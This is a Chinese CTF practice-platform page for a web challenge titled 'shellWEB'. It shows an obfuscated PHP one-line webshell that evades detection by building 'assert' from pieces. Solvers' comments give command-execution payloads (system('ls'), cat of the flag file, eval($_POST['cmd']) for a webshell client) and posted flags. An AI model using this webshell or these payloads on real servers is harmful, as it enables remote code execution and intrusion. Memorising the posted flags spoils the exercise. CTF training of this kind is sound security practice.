shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 5103
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
freestyle 1月前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

我是CTF大王 1月前

http://114.67.175.224:16478/?s=system(%27ls%27) http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我是CTF大王 1月前

http://114.67.175.224:16478/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 1

000ooo 1月前

?s=eval+($_POST['123'])

回复 1

ruien 2月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 2月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 2月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 2月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 2月前

?s=eval($_POST["cmd"])

回复 0

15824777912 3月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(6)

解题动态

CTFKnight 攻破了该题 2小时前
用心好吗笨蛋 攻破了该题 4小时前
sunzz3183 攻破了该题 22小时前
1877594554o 攻破了该题 1天前
kaill 攻破了该题 1天前
yanzhenfeng 攻破了该题 1天前
tfios 攻破了该题 1天前
pigbigstrong 攻破了该题 1天前
bababei 攻破了该题 1天前
mushmush 攻破了该题 2天前
micecAtcHCat 攻破了该题 2天前
TOMCAT336699 攻破了该题 3天前
fwsw 攻破了该题 3天前
HuangZuGuang 攻破了该题 4天前
dengzhechuang 攻破了该题 4天前
18267395325 攻破了该题 5天前
264wyj 攻破了该题 5天前
3210075458 攻破了该题 5天前
3417266296 攻破了该题 5天前
起名好难 攻破了该题 5天前
问题反馈